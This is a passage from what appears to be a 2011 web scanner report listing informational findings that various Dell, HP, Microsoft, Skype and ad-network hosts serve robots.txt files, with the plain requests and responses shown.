Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Cache-Control: private, no-cache, no-store, must-revalidate
Date: Mon, 05 Sep 2011 02:30:58 GMT
Content-Length: 47
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

23.11. http://ce.lijit.com/merge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ce.lijit.com
Path:   /merge

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ce.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:55 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n55 ( lax-agg-n38), ht-d lax-agg-n38.panthercdn.com
ETag: "5b80d5-17a-4aacf20bc34c0"
Cache-Control: max-age=604800
Expires: Wed, 07 Sep 2011 12:18:03 GMT
Age: 396772
Content-Length: 378
Content-Type: text/plain; charset=UTF-8
Last-Modified: Thu, 18 Aug 2011 22:28:11 GMT
Connection: close

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...

23.12. http://community.skype.com/t5/English/ct-p/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/English/ct-p/English

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: community.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:48 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Wed, 03 Aug 2011 08:10:05 GMT
ETag: "196198d-197-4a995644f9140"
Accept-Ranges: bytes
Content-Length: 407
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# Default Generated robots.txt file
User-agent: *
Crawl-delay: 5
Disallow: /t5/forums/forumtopicprintpage
Disallow: /t5/ideas/ideaprintpage
Disallow: /t5/blogs/blogarticleprintpage
Disallow: /t5/help
...[SNIP]...

23.13. http://content-cdn.dell.com/css/dyn/CSSC.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content-cdn.dell.com
Path:   /css/dyn/CSSC.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: content-cdn.dell.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Aug 2010 16:53:02 GMT
ETag: "b7692e7d633dcb1:0"
P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI "
Date: Sun, 04 Sep 2011 16:19:09 GMT
Content-Length: 493
Connection: close

User-agent: *
Allow: /
Disallow: /us/p
Disallow: /us/business/p
Disallow: /mc.ash*
Disallow: /hpcc.aspx
Disallow: */api/
Disallow: */en/home/
Sitemap: http://content.dell.com/au.sitemap.txt
S
...[SNIP]...

23.14. http://content.dell.com/us/en/business/security-network.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.dell.com
Path:   /us/en/business/security-network.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: content.dell.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Aug 2010 16:53:02 GMT
Accept-Ranges: bytes
ETag: "b7692e7d633dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI "
Date: Sun, 04 Sep 2011 16:19:09 GMT
Connection: close
Content-Length: 493

User-agent: *
Allow: /
Disallow: /us/p
Disallow: /us/business/p
Disallow: /mc.ash*
Disallow: /hpcc.aspx
Disallow: */api/
Disallow: */en/home/
Sitemap: http://content.dell.com/au.sitemap.txt
S
...[SNIP]...

23.15. http://crl.geotrust.com/crls/secureca.crl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crl.geotrust.com
Path:   /crls/secureca.crl

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: crl.geotrust.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 05 Sep 2011 02:48:36 GMT
Content-Length: 26
Content-Type: text/plain
X-Powered-By: Servlet/2.5 JSP/2.1

User-agent: *
Disallow: /

23.16. http://dce.sapha.com/engine.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /engine.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dce.sapha.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 18 Oct 2008 22:29:29 GMT
ETag: "6d095cd-27-9d78a440"
Accept-Ranges: bytes
Content-Length: 39
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt
User-agent: *
Disallow: /

23.17. http://dell-bsd_us.baynote.net/baynote/tags3/policy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dell-bsd_us.baynote.net
Path:   /baynote/tags3/policy

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dell-bsd_us.baynote.net

Response

HTTP/1.1 200 OK
Server: BNServer
Accept-Ranges: bytes
ETag: W/"216-1253825728000"
Last-Modified: Thu, 24 Sep 2009 20:55:28 GMT
Content-Type: text/plain
Content-Length: 216
Date: Sun, 04 Sep 2011 16:19:15 GMT
Connection: close

User-agent: *
Disallow: /baynote/
Disallow: /error400.html
Disallow: /error403.html
Disallow: /error404.html
Disallow: /error500.html
Disallow: /index.jsp
Disallow: /search/
Disallow: /socialsearch/
D
...[SNIP]...

23.18. http://dell-global.baynote.net/baynote/tags3/common  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dell-global.baynote.net
Path:   /baynote/tags3/common

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dell-global.baynote.net

Response

HTTP/1.1 200 OK
Server: BNServer
Accept-Ranges: bytes
ETag: W/"216-1253825728000"
Last-Modified: Thu, 24 Sep 2009 20:55:28 GMT
Content-Type: text/plain
Content-Length: 216
Date: Sun, 04 Sep 2011 16:19:14 GMT
Connection: close

User-agent: *
Disallow: /baynote/
Disallow: /error400.html
Disallow: /error403.html
Disallow: /error404.html
Disallow: /error500.html
Disallow: /index.jsp
Disallow: /search/
Disallow: /socialsearch/
D
...[SNIP]...

23.19. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dellinc.tt.omtrdc.net
Path:   /m2/dellinc/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dellinc.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: text/plain
Date: Sun, 04 Sep 2011 16:19:15 GMT
Accept-Ranges: bytes
ETag: W/"25-1309299047000"
Connection: close
Last-Modified: Tue, 28 Jun 2011 22:10:47 GMT
Content-Length: 25

User-agent: *
Disallow: /

23.20. http://eas.apm.emediate.eu/eas  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eas.apm.emediate.eu
Path:   /eas

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: eas.apm.emediate.eu

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 01:54:58 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Tue, 16 Mar 2010 12:13:38 GMT
ETag: "1a-481e9ed73e080"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=0
Expires: Mon, 05 Sep 2011 01:54:58 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

23.21. http://ecustomeropinions.com/survey/survey.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ecustomeropinions.com
Path:   /survey/survey.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ecustomeropinions.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:08:23 GMT
Server: Apache
Last-Modified: Wed, 13 Jul 2011 09:33:13 GMT
ETag: "2a5076-7d-1af38840"
Accept-Ranges: bytes
Content-Length: 125
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /popup/
Disallow: /survey/
Disallow: /s/
Disallow: /test/
Disallow: /public/
Disallow: /unsubscribe/

23.22. http://embed.technorati.com/linkcount  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://embed.technorati.com
Path:   /linkcount

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: embed.technorati.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:18:35 GMT
Server: Apache
Last-Modified: Thu, 22 Apr 2010 17:48:45 GMT
ETag: "21ccdb-20-484d6ec0d3940"
Accept-Ranges: bytes
Content-Length: 32
Content-Type: text/plain; charset=iso-8859-1
X-Pad: avoid browser bug
Connection: close

User-agent: *
Disallow: /search

23.23. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 21:24:47 GMT
Server: Floodlight server
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

23.24. https://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://fls.doubleclick.net
Path:   /activityi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 21:17:38 GMT
Server: Floodlight server
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

23.25. http://gacela.eu/bb/mrcsrc/getpixel.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gacela.eu
Path:   /bb/mrcsrc/getpixel.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gacela.eu

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 01:55:04 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 13:45:59 GMT
ETag: "c1be10-30-4ab40884013c0"
Accept-Ranges: bytes
Content-Length: 48
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# No Robots allowed
User-agent: *
Disallow: /

23.26. https://h10078.www1.hp.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://h10078.www1.hp.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: h10078.www1.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:30:56 GMT
Server: Apache
Last-Modified: Mon, 14 Mar 2011 21:58:00 GMT
ETag: "1bf51-1a8-67b4aa00"
Accept-Ranges: bytes
Content-Length: 424
Cache-Control: max-age=7200
Expires: Sun, 04 Sep 2011 18:30:56 GMT
Connection: close
Content-Type: text/plain

#$Header: robots.txt,v 1.18 2008/04/23 15:03:11 autreja Exp $ $Locker: autreja $

# robots.txt file for www.hp.com
# send e-mail to hp<dot>comOperations<at>hp<dot>com for updates or problems

User-age
...[SNIP]...

23.27. http://h10088.www1.hp.com/cda/gap/display/main/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h10088.www1.hp.com
Path:   /cda/gap/display/main/index.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: h10088.www1.hp.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 14 Mar 2011 21:58:00 GMT
ETag: "6d2a-1a8-67b4aa00"
Accept-Ranges: bytes
Content-Length: 424
Content-Type: text/plain
Cache-Control: max-age=7200
Expires: Sun, 04 Sep 2011 18:30:56 GMT
Date: Sun, 04 Sep 2011 16:30:56 GMT
Connection: close

#$Header: robots.txt,v 1.18 2008/04/23 15:03:11 autreja Exp $ $Locker: autreja $

# robots.txt file for www.hp.com
# send e-mail to hp<dot>comOperations<at>hp<dot>com for updates or problems

User-age
...[SNIP]...

23.28. http://h20158.www2.hp.com/gms/ks/sq/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h20158.www2.hp.com
Path:   /gms/ks/sq/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: h20158.www2.hp.com

Response

HTTP/1.1 200 OK
Content-Length: 59
Content-Type: text/plain
Last-Modified: Tue, 03 Mar 2009 10:28:07 GMT
Accept-Ranges: bytes
ETag: "31ed86beea9bc91:abf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:31:02 GMT
Connection: close

# robots.txt

User-agent: *
Disallow: /banner_test/


23.29. http://h20180.www2.hp.com/apps/Nav  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h20180.www2.hp.com
Path:   /apps/Nav

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: h20180.www2.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:31:03 GMT
Server: Apache
Last-Modified: Thu, 30 Sep 2010 06:39:06 GMT
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=7200
Expires: Sun, 04 Sep 2011 18:31:03 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

23.30. http://h20219.www2.hp.com/services/us/en/business-it-services.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h20219.www2.hp.com
Path:   /services/us/en/business-it-services.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: h20219.www2.hp.com

Response

HTTP/1.1 200 OK
Content-Length: 71
Content-Type: text/plain
Last-Modified: Tue, 20 Jan 2009 04:02:32 GMT
Accept-Ranges: bytes
ETag: "07c2bebb37ac91:268"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:31:03 GMT
Connection: close

User-agent: *
Disallow: /404/
Disallow: /Library/
Disallow: /render/

23.31. http://h30261.www3.hp.com/phoenix.zhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30261.www3.hp.com
Path:   /phoenix.zhtml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: h30261.www3.hp.com

Response

HTTP/1.0 200 OK
Content-Length: 2676
Content-Type: text/plain
Last-Modified: Sun, 04 Sep 2011 12:00:01 GMT
Accept-Ranges: bytes
ETag: "9059332dfa6acc1:34b3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Sun, 04 Sep 2011 16:32:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 16:32:31 GMT
Connection: close

# ========v2.5 - 05/10/10=========================#


User-agent: *
Disallow: /preview
Disallow: /redesign
Disallow: /staging


# ========List of banned bots=========================#

User
...[SNIP]...

23.32. http://h30434.www3.hp.com/psg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30434.www3.hp.com
Path:   /psg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: h30434.www3.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:32:32 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 02 Sep 2011 07:56:55 GMT
ETag: "1620022-194-4abf0b4765fc0"
Accept-Ranges: bytes
Content-Length: 404
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# Default Generated robots.txt file
User-agent: *
Crawl-delay: 5
Disallow: /t5/forums/forumtopicprintpage
Disallow: /t5/ideas/ideaprintpage
Disallow: /t5/blogs/blogarticleprintpage
Disallow: /t5/help
...[SNIP]...

23.33. http://h30499.www3.hp.com/hpeb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30499.www3.hp.com
Path:   /hpeb

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: h30499.www3.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:32:33 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Last-Modified: Wed, 31 Aug 2011 07:03:38 GMT
ETag: "18820be3-195-4abc7ba457e3e"
Accept-Ranges: bytes
Content-Length: 405
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# Default Generated robots.txt file
User-agent: *
Crawl-delay: 5
Disallow: /t5/forums/forumtopicprintpage
Disallow: /t5/ideas/ideaprintpage
Disallow: /t5/blogs/blogarticleprintpage
Disallow: /t5/help
...[SNIP]...

23.34. http://h30501.www3.hp.com/hpsws  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30501.www3.hp.com
Path:   /hpsws

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: h30501.www3.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:32:33 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Last-Modified: Wed, 27 Jul 2011 07:52:32 GMT
ETag: "2819497f-196-4a90854b65082"
Accept-Ranges: bytes
Content-Length: 406
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# Default Generated robots.txt file
User-agent: *
Crawl-delay: 5
Disallow: /t5/forums/forumtopicprintpage
Disallow: /t5/ideas/ideaprintpage
Disallow: /t5/blogs/blogarticleprintpage
Disallow: /t5/help
...[SNIP]...

23.35. http://h30507.www3.hp.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30507.www3.hp.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: h30507.www3.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:32:33 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Wed, 31 Aug 2011 09:01:47 GMT
ETag: "1821e38-137-4abc960c2d4c0"
Accept-Ranges: bytes
Content-Length: 311
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Crawl-delay: 5
Disallow: /t5/forums/forumtopicprintpage
Disallow: /t5/ideas/ideaprintpage
Disallow: /t5/blogs/blogarticleprintpage
Disallow: /t5/help/faqpage
Disallow: /t5/forums/userson
...[SNIP]...

23.36. http://h41174.www4.hp.com/4/hp/us/en/hho/post_sales/products/hub/|/r3990/|apps/nav/1684651975@x01,x02,x31,x32,x33,Top1,Top2,Top3,Top,Left1,Left2,Left3,x04,x41,x42,x43,x44,x45,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Frame1,Frame2,x11,x12,x13,x14,x15  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h41174.www4.hp.com
Path:   /4/hp/us/en/hho/post_sales/products/hub/|/r3990/|apps/nav/1684651975@x01,x02,x31,x32,x33,Top1,Top2,Top3,Top,Left1,Left2,Left3,x04,x41,x42,x43,x44,x45,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Frame1,Frame2,x11,x12,x13,x14,x15

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: h41174.www4.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 22:41:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jan 2008 16:38:45 GMT
ETag: "66b554-1a-442d407034f40"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /

23.37. http://h71028.www7.hp.com/enterprise/us/en/solutions/large-enterprise-business-solutions.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h71028.www7.hp.com
Path:   /enterprise/us/en/solutions/large-enterprise-business-solutions.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: h71028.www7.hp.com

Response

HTTP/1.1 200 OK
Content-Length: 71
Content-Type: text/plain
Last-Modified: Tue, 20 Jan 2009 04:02:32 GMT
Accept-Ranges: bytes
ETag: "07c2bebb37ac91:383"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:32:36 GMT
Connection: close

User-agent: *
Disallow: /404/
Disallow: /Library/
Disallow: /render/

23.38. http://h71036.www7.hp.com/hho/cache/252121-0-0-225-121.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h71036.www7.hp.com
Path:   /hho/cache/252121-0-0-225-121.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: h71036.www7.hp.com

Response

HTTP/1.1 200 OK
Content-Length: 71
Content-Type: text/plain
Last-Modified: Tue, 20 Jan 2009 04:02:32 GMT
Accept-Ranges: bytes
ETag: "07c2bebb37ac91:3d0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:32:36 GMT
Connection: close

User-agent: *
Disallow: /404/
Disallow: /Library/
Disallow: /render/

23.39. http://i.dell.com/images/global/general/doc-ready.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.dell.com
Path:   /images/global/general/doc-ready.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: i.dell.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Wed, 06 Jul 2011 18:32:17 GMT
ETag: "804e648b3ccc1:0"
Date: Sun, 04 Sep 2011 16:19:15 GMT
Content-Length: 26
Connection: close

User-agent: *
Disallow: /

23.40. http://img-cdn.mediaplex.com/0/12309/universal.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img-cdn.mediaplex.com
Path:   /0/12309/universal.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img-cdn.mediaplex.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sat, 10 Mar 2007 17:40:16 GMT
ETag: "1384e1-1a-42b5608766000"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=ISO-8859-1
Date: Sun, 04 Sep 2011 16:19:15 GMT
Connection: close
X-N: S

User-agent: *
Disallow: /

23.41. http://js.microsoft.com/library/svy/sto/broker-config.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.microsoft.com
Path:   /library/svy/sto/broker-config.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: js.microsoft.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Wed, 13 Sep 2006 01:14:33 GMT
ETag: "a948f0f8d1d6c61:0"
Server: Microsoft-IIS/7.5
VTag: 438539041900000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Cache-Control: max-age=900
Date: Mon, 05 Sep 2011 02:23:13 GMT
Content-Length: 155
Connection: close

# Robots.txt file for non www.microsoft.com hostnames (e.g. img.microsoft.com, css.microsoft.com, js.microsoft.com, ...)
#

User-agent: *
Disallow: /

23.42. http://met1.hp.com/b/ss/hphqsearch/1/H.22.1/s31933527498040  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://met1.hp.com
Path:   /b/ss/hphqsearch/1/H.22.1/s31933527498040

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: met1.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:48 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "1694ca-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www391
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

23.43. http://metrics.skype.com/b/ss/skypeallprod/1/H.17/s33706402148852  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.skype.com
Path:   /b/ss/skypeallprod/1/H.17/s33706402148852

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 17:59:14 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "e9e04-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www83
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

23.44. http://microsoftsto.112.2o7.net/b/ss/msstomsdn,msstomsdnonly,msstomsdnmktenus,msstolibrollup,msstolibwebdev,msstouberie/1/H.20.3/s6623076066840  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftsto.112.2o7.net
Path:   /b/ss/msstomsdn,msstomsdnonly,msstomsdnmktenus,msstolibrollup,msstolibwebdev,msstouberie/1/H.20.3/s6623076066840

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: microsoftsto.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:23:14 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "225930-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www415
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

23.45. http://msdn.microsoft.com/en-us/library/ms533897(v=vs.85).aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms533897(v=vs.85).aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: msdn.microsoft.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 01 Aug 2011 10:05:50 GMT
Accept-Ranges: bytes
ETag: "e4eb34973250cc1:0"
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 02:23:10 GMT
Connection: keep-alive
Content-Length: 4152

# ------------ Microsoft Developer Network --------------------
User-Agent: *

# Disallow List
# applications
# note: 1,553,322 directories
Disallow: /platform/
Disallow: /Platform/
Disallow
...[SNIP]...

23.46. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/plain
Last-Modified: Fri, 19 Aug 2011 17:48:38 GMT
Accept-Ranges: bytes
ETag: "09f8539985ecc1:0"
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Sun, 04 Sep 2011 16:18:34 GMT
Connection: keep-alive
Content-Length: 44

# do not index
User-agent: *
Disallow: /

23.47. http://nsm.dell.com/b/ss/dellglobalonline/1/H.23.3/s3547971131745  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nsm.dell.com
Path:   /b/ss/dellglobalonline/1/H.23.3/s3547971131745

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nsm.dell.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:16 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "251df0-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www115
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

23.48. http://pagead2.googlesyndication.com/pagead/imgad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 05 Sep 2011 01:39:34 GMT
Expires: Tue, 06 Sep 2011 01:39:34 GMT
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 439

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

23.49. http://pixel.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The web server contains a robots.txt file.

Request

